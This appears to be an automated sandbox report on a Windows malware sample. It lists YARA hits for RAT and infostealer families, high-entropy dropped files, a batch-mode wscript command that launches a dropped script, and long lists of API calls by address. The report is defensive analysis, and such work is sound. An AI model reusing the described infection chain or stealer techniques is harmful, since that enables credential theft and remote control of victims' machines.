                  Source: unknownNetwork traffic detected: HTTP traffic on port 62097 -> 443
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62055 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62056 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62057 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62184 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected Keylogger Generic
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Yara detected VenomRAT
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_003DF7C7
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,27_2_003DF55C
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003F9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,27_2_003F9FD2

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Writes many files with high entropy
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Argentina.pub entropy: 7.99765353495Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Distinguished.pub entropy: 7.99809266375Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Poem.pub entropy: 7.99733876431Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Governor.pub entropy: 7.99796220639Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Swingers.pub entropy: 7.99812528823Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Legislation.pub entropy: 7.99786443988Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Explicitly.pub entropy: 7.99686467774Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Comparison.pub entropy: 7.99674290091Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Enlarge.pub entropy: 7.99778287234Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Listening.pub entropy: 7.99720925196Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Gate.pub entropy: 7.9966611885Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Preference.pub entropy: 7.99684640346Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Apartments.pub entropy: 7.99764085482Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Republican.pub entropy: 7.99632178366Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Amenities.pub entropy: 7.99702026084Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Worcester.pub entropy: 7.99796554729Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Generating.pub entropy: 7.99807030539Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Regulation.pub entropy: 7.99630322854Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Performing.pub entropy: 7.99750792054Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Robert.pub entropy: 7.99725695551Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Maintains.pub entropy: 7.99814457245Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Document.pub entropy: 7.99688077856Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Confusion.pub entropy: 7.99759203123Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Reverse.pub entropy: 7.99813463449Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Vacation.pub entropy: 7.99753681116Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Vampire.pub entropy: 7.99666754967Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Blood.pub entropy: 7.99804267671Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Hell.pub entropy: 7.99698268184Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Breaks.pub entropy: 7.99810429407Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Concept.pub entropy: 7.99720276963Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Really.pub entropy: 7.99835078472Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Urban.pub entropy: 7.99778737709Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Trademarks.pub entropy: 7.99757414761Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Thousand.pub entropy: 7.99729046263Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Silly.pub entropy: 7.99829492948Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Both.pub entropy: 7.99806131353Jump to dropped file
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Bull.pub entropy: 7.99770447322Jump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\m entropy: 7.99992399201Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\F entropy: 7.99992399201Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99602810784Jump to dropped file

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000024.00000002.2543057851.00007FF7C7371000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 00000025.00000002.2542566206.000001FD691D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript called in batch mode (surpress errors)
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_01817160 NtProtectVirtualMemory,30_2_01817160
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_01816D08 NtProtectVirtualMemory,30_2_01816D08
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,27_2_003D4763
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,27_2_003C1B4D
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,27_2_003CF20D
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\PerfectlyFdaJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\AccreditationShedJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\GovernmentsHighlyJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\HighKerryJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\PracticalPreventJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\FilenameWhoJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\UpdatedMakeupJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_0040497C0_2_0040497C
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406ED20_2_00406ED2
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004074BB0_2_004074BB
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0038801727_2_00388017
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0037E14427_2_0037E144
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0036E1F027_2_0036E1F0
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0039A26E27_2_0039A26E
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003822A227_2_003822A2
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003622AD27_2_003622AD
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0037C62427_2_0037C624
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0039E87F27_2_0039E87F
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003EC8A427_2_003EC8A4
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D2A0527_2_003D2A05
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00396ADE27_2_00396ADE
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C8BFF27_2_003C8BFF
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0037CD7A27_2_0037CD7A
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0038CE1027_2_0038CE10
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0039715927_2_00397159
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0036924027_2_00369240
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003F531127_2_003F5311
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003696E027_2_003696E0
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0038170427_2_00381704
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00381A7627_2_00381A76
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00369B6027_2_00369B60
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00387B8B27_2_00387B8B
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00381D2027_2_00381D20
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00387DBA27_2_00387DBA
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00381FE727_2_00381FE7
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_01814EF830_2_01814EF8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_018157C830_2_018157C8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0181618030_2_01816180
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0181619030_2_01816190
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_01814BB030_2_01814BB0
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_01816D0830_2_01816D08
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_06E2A44930_2_06E2A449
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706031730_2_07060317
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706906630_2_07069066
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07068FA130_2_07068FA1
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706940730_2_07069407
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_070693B930_2_070693B9
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706923330_2_07069233
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706910330_2_07069103
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706914430_2_07069144
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706916930_2_07069169
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_0706918E30_2_0706918E
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_070691B130_2_070691B1
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_070690A730_2_070690A7
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_070690D530_2_070690D5
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07067D3830_2_07067D38
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07F0C32830_2_07F0C328
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07F0E93030_2_07F0E930
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07F0DCA830_2_07F0DCA8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07F0F08830_2_07F0F088
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07F0A43030_2_07F0A430
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_07F0B02830_2_07F0B028
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709F46036_2_00007FF7C709F460
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709E0E036_2_00007FF7C709E0E0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709D76036_2_00007FF7C709D760
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C71AF3C036_2_00007FF7C71AF3C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709FE6F36_2_00007FF7C709FE6F
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709B2A036_2_00007FF7C709B2A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709EEF036_2_00007FF7C709EEF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7094AF036_2_00007FF7C7094AF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709CAE036_2_00007FF7C709CAE0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709F71036_2_00007FF7C709F710
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709C94036_2_00007FF7C709C940
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C71AF59036_2_00007FF7C71AF590
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A71C036_2_00007FF7C70A71C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C71AF1B036_2_00007FF7C71AF1B0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C71B9E1036_2_00007FF7C71B9E10
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70D284036_2_00007FF7C70D2840
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A487036_2_00007FF7C70A4870
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709689036_2_00007FF7C7096890
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A18AC36_2_00007FF7C70A18AC
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709B0A036_2_00007FF7C709B0A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A04C036_2_00007FF7C70A04C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A24F036_2_00007FF7C70A24F0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70CFCF036_2_00007FF7C70CFCF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70D011036_2_00007FF7C70D0110
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709250936_2_00007FF7C7092509
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709250936_2_00007FF7C7092509
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A0F4036_2_00007FF7C70A0F40
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709174036_2_00007FF7C7091740
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7094AF036_2_00007FF7C7094AF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70C276036_2_00007FF7C70C2760
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70CF79036_2_00007FF7C70CF790
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C719FF5C36_2_00007FF7C719FF5C
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C715B76036_2_00007FF7C715B760
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7091B8636_2_00007FF7C7091B86
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70D03A036_2_00007FF7C70D03A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7092FC036_2_00007FF7C7092FC0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709C3C436_2_00007FF7C709C3C4
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70D1FF036_2_00007FF7C70D1FF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70D23E036_2_00007FF7C70D23E0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709381036_2_00007FF7C7093810
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709D64036_2_00007FF7C709D640
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70C124036_2_00007FF7C70C1240
